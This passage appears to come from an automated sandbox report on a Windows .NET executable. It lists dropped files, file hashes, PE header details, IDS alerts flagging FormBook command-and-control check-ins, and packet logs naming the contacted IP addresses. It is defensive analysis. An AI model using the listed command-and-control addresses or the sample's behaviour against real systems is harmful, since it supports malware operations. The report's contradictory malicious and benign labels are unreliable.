SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:tLHyIFKL3IZ2KRH9OugYs
MD5:	10E0B87B6111C866FC3B823731B377C7
SHA1:	B646EB7AF6029026F543BD48696E70F6551AA62B
SHA-256:	B8FF8B3EB3D58E1CFA8BE5364CCAE333151F10B33CD4252E99D5165A6BE5B160
SHA-512:	C42EA2C6876D6BC067CC2556597E4475E584D83BF0187EBE1D41645F481D6C4725C3BF65E4D6BAA5BDA076E2702BCE9DBE74ECF8B8D3C0A219D50A84F8AB6DAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\030c0fG

Download File

Process:	C:\Windows\SysWOW64\nslookup.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfw153pf.q5j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa0h0x4p.51m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3ik5t5z.gk5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyzz4iki.3te.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.088085333188221
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	A4mmSHCUi2.exe
File size:	1'049'600 bytes
MD5:	53becf41ba02fdbc491515ba9cf6cc96
SHA1:	88533f5d751e62ef83170c3081bbc4f2b9783996
SHA256:	f5de23b1693c6872f53f4925775cfeac355a619a0813c603929221aa69513b38
SHA512:	e3012db31c0d03e33f3f4620f15944d5ad066d07da9b199787c01e560e880f06d472ca9adce99a2b8d4d94f26e788327ea143a8517ba0d14b6454eb41905734e
SSDEEP:	24576:DTfVqijKZSZ7ghuJKqiZtd4ILsW4o5PrL:DTfV9jKCghaJCt+ILH5PrL
TLSH:	09258CE136A2E736DC5D2670701CCDBD92612E2830D479926EE93FAB3DBD2914938F11
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B$g..............0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	b5b58182aaa8aa82

Static PE Info

General

Entrypoint:	0x500612
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672442F9 [Fri Nov 1 02:54:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FB83C8264F2h
je 00007FB83C8264F2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FB83C8264F2h
imul eax, dword ptr [eax], 00610076h
je 00007FB83C8264F2h
outsd
add byte ptr [edx+00h], dh
dec ebp
add byte ptr [ebp+00h], ah
insd
add byte ptr [edi+00h], ch
jc 00007FB83C8264F2h
imul eax, dword ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1005c0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x102000	0x1618	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x104000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfe648	0xfe800	f9bf60ad10386b602ad717a5cc6ed7f2	False	0.7345169756876228	data	7.091682077929142	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x102000	0x1618	0x1800	0e1c22fb680994e7d26902ea03aaef2b	False	0.72900390625	data	6.794656855126016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0xc	0x200	620ad12c2c818c6dcc87b193ca3a17ed	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1020c8	0x1218	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8698186528497409
RT_GROUP_ICON	0x1032f0	0x14	data	1.05
RT_VERSION	0x103314	0x300	MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"	0.453125

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-02T05:25:16.177203+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49735	TCP
2024-11-02T05:25:43.881150+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49741	168.76.221.252	80	TCP
2024-11-02T05:25:54.601583+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49742	TCP
2024-11-02T05:26:00.071063+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49758	216.40.34.41	80	TCP
2024-11-02T05:26:02.603393+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49773	216.40.34.41	80	TCP
2024-11-02T05:26:05.190524+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49789	216.40.34.41	80	TCP
2024-11-02T05:26:07.731461+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49802	216.40.34.41	80	TCP
2024-11-02T05:26:13.698036+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49836	161.97.142.144	80	TCP
2024-11-02T05:26:16.249712+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49852	161.97.142.144	80	TCP
2024-11-02T05:26:18.796878+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49865	161.97.142.144	80	TCP
2024-11-02T05:26:21.324411+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49879	161.97.142.144	80	TCP
2024-11-02T05:26:27.228092+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49913	188.114.97.3	80	TCP
2024-11-02T05:26:29.781867+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49925	188.114.97.3	80	TCP
2024-11-02T05:26:32.350794+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49940	188.114.97.3	80	TCP
2024-11-02T05:26:34.902812+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49956	188.114.97.3	80	TCP
2024-11-02T05:26:41.420729+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49990	194.58.112.174	80	TCP
2024-11-02T05:26:43.582589+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50003	194.58.112.174	80	TCP
2024-11-02T05:26:46.157049+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	194.58.112.174	80	TCP
2024-11-02T05:26:48.707068+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50023	194.58.112.174	80	TCP
2024-11-02T05:26:54.590803+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	13.248.169.48	80	TCP
2024-11-02T05:26:57.136264+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	13.248.169.48	80	TCP
2024-11-02T05:26:59.836718+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	13.248.169.48	80	TCP
2024-11-02T05:27:02.481983+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50027	13.248.169.48	80	TCP
2024-11-02T05:27:17.107899+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	162.240.81.18	80	TCP
2024-11-02T05:27:19.664499+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	162.240.81.18	80	TCP
2024-11-02T05:27:22.189903+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	162.240.81.18	80	TCP
2024-11-02T05:27:24.762928+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50031	162.240.81.18	80	TCP
2024-11-02T05:27:31.044330+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	162.0.211.143	80	TCP
2024-11-02T05:27:33.551012+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	162.0.211.143	80	TCP
2024-11-02T05:27:36.115837+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50034	162.0.211.143	80	TCP
2024-11-02T05:27:38.668963+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50035	162.0.211.143	80	TCP
2024-11-02T05:27:44.462436+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	76.223.67.189	80	TCP
2024-11-02T05:27:47.942774+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	76.223.67.189	80	TCP
2024-11-02T05:27:50.489473+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50038	76.223.67.189	80	TCP
2024-11-02T05:27:52.170530+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50039	76.223.67.189	80	TCP
2024-11-02T05:28:03.063156+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50040	13.248.169.48	80	TCP
2024-11-02T05:28:05.609929+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50041	13.248.169.48	80	TCP
2024-11-02T05:28:08.112933+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50042	13.248.169.48	80	TCP
2024-11-02T05:28:10.710645+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50043	13.248.169.48	80	TCP
2024-11-02T05:28:17.398487+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50044	154.23.184.185	80	TCP
2024-11-02T05:28:20.020721+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50045	154.23.184.185	80	TCP
2024-11-02T05:28:22.708255+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50046	154.23.184.185	80	TCP
2024-11-02T05:28:25.630419+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50047	154.23.184.185	80	TCP
2024-11-02T05:28:32.043665+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50048	172.67.217.184	80	TCP
2024-11-02T05:28:34.616508+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50049	172.67.217.184	80	TCP
2024-11-02T05:28:37.140492+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50050	172.67.217.184	80	TCP
2024-11-02T05:28:39.686494+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50051	172.67.217.184	80	TCP
2024-11-02T05:28:45.834442+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50052	195.154.200.15	80	TCP
2024-11-02T05:28:48.382682+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50053	195.154.200.15	80	TCP
2024-11-02T05:28:50.828441+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50054	195.154.200.15	80	TCP
2024-11-02T05:28:53.438834+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50055	195.154.200.15	80	TCP
2024-11-02T05:29:00.786551+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50056	103.191.208.137	80	TCP
2024-11-02T05:29:03.708504+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50057	103.191.208.137	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 05:25:42.731647015 CET	49741	80	192.168.2.4	168.76.221.252
Nov 2, 2024 05:25:42.737992048 CET	80	49741	168.76.221.252	192.168.2.4
Nov 2, 2024 05:25:42.738068104 CET	49741	80	192.168.2.4	168.76.221.252
Nov 2, 2024 05:25:42.745809078 CET	49741	80	192.168.2.4	168.76.221.252
Nov 2, 2024 05:25:42.750662088 CET	80	49741	168.76.221.252	192.168.2.4
Nov 2, 2024 05:25:43.881038904 CET	80	49741	168.76.221.252	192.168.2.4
Nov 2, 2024 05:25:43.881150007 CET	49741	80	192.168.2.4	168.76.221.252
Nov 2, 2024 05:25:43.884275913 CET	49741	80	192.168.2.4	168.76.221.252
Nov 2, 2024 05:25:43.889262915 CET	80	49741	168.76.221.252	192.168.2.4
Nov 2, 2024 05:25:59.361401081 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:25:59.366928101 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:25:59.366997004 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:25:59.377573013 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:25:59.383179903 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.070993900 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.071007967 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.071017981 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.071063042 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.079111099 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079121113 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079138041 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079149008 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079166889 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079178095 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079189062 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079197884 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.079200983 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079242945 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.079828978 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.079871893 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.108961105 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.108971119 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.109117985 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.189637899 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.189651012 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.189666033 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.189718008 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.189753056 CET	80	49758	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:00.189800024 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:00.880012035 CET	49758	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:01.898515940 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:01.903409958 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:01.903580904 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:01.914421082 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:01.919270992 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603230953 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603362083 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603372097 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603384018 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603393078 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.603394985 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603408098 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603420019 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603430033 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.603431940 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603442907 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603451014 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.603455067 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.603478909 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.603494883 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.608310938 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.608328104 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.608371019 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.641122103 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.641130924 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.641176939 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:02.722187042 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.722198009 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.722208023 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.722210884 CET	80	49773	216.40.34.41	192.168.2.4
Nov 2, 2024 05:26:02.722423077 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:03.426786900 CET	49773	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:04.445676088 CET	49789	80	192.168.2.4	216.40.34.41
Nov 2, 2024 05:26:04.450587034 CET	80	49789	216.40.34.41	192.168.2.4
